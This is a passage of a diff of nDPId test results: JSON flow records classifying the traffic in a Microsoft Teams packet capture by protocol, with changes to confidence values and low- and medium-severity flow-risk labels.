{"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1587041682076,"flow_last_seen":1587041682204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12188,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1587041682077,"flow_last_seen":1587041682212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10552,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 
+00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1587041682369,"flow_last_seen":1587041683086,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":86354,"flow_avg_l4_payload_len":807,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1587041682376,"flow_last_seen":1587041692106,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9736,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1587041682698,"flow_last_seen":1587041691929,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":14416,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10412,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1587041683333,"flow_last_seen":1587041683650,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15546,"flow_avg_l4_payload_len":536,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1587041685106,"flow_last_seen":1587041685981,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8860,"flow_avg_l4_payload_len":369,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041685232,"flow_last_seen":1587041685890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9605,"flow_avg_l4_payload_len":384,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
+00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1587041685248,"flow_last_seen":1587041688035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":11696,"flow_avg_l4_payload_len":377,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041686239,"flow_last_seen":1587041686589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18814,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
+00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041687245,"flow_last_seen":1587041688061,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":22353,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041691149,"flow_last_seen":1587041691582,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10149,"flow_avg_l4_payload_len":307,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 
+00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1587041694219,"flow_last_seen":1587041695993,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8320,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041672419,"flow_last_seen":1587041697427,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":1674,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041673094,"flow_last_seen":1587041677380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Telegram","breed":"Acceptable","category":"Chat"}} 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041673094,"flow_last_seen":1587041677380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041684291,"flow_last_seen":1587041684304,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1587041684306,"flow_last_seen":1587041685465,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":14487,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} 
-00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685243,"flow_last_seen":1587041685256,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1587041682809,"flow_last_seen":1587041688190,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1226,"flow_tot_l4_payload_len":2932,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
-00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1587041692808,"flow_last_seen":1587041695538,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1225,"flow_tot_l4_payload_len":4100,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041683142,"flow_last_seen":1587041683184,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1587041693428,"flow_last_seen":1587041697999,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1201,"flow_tot_l4_payload_len":12443,"flow_avg_l4_payload_len":401,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":51681,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Azure","breed":"Acceptable","category":"Cloud"}} 
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041684291,"flow_last_seen":1587041684304,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1587041684306,"flow_last_seen":1587041685465,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":14487,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} 
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685243,"flow_last_seen":1587041685256,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1587041682809,"flow_last_seen":1587041688190,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1226,"flow_tot_l4_payload_len":2932,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1587041692808,"flow_last_seen":1587041695538,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1225,"flow_tot_l4_payload_len":4100,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041683142,"flow_last_seen":1587041683184,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1587041693428,"flow_last_seen":1587041697999,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1201,"flow_tot_l4_payload_len":12443,"flow_avg_l4_payload_len":401,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":51681,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"3":"DPI (partial)"},"proto":"STUN.Azure","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1587041693428,"flow_last_seen":1587041697999,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1201,"flow_tot_l4_payload_len":12443,"flow_avg_l4_payload_len":401,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":51681,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682668,"flow_last_seen":1587041682697,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682668,"flow_last_seen":1587041682697,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"}} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692528,"flow_last_seen":1587041692578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692528,"flow_last_seen":1587041692578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682129,"flow_last_seen":1587041682143,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 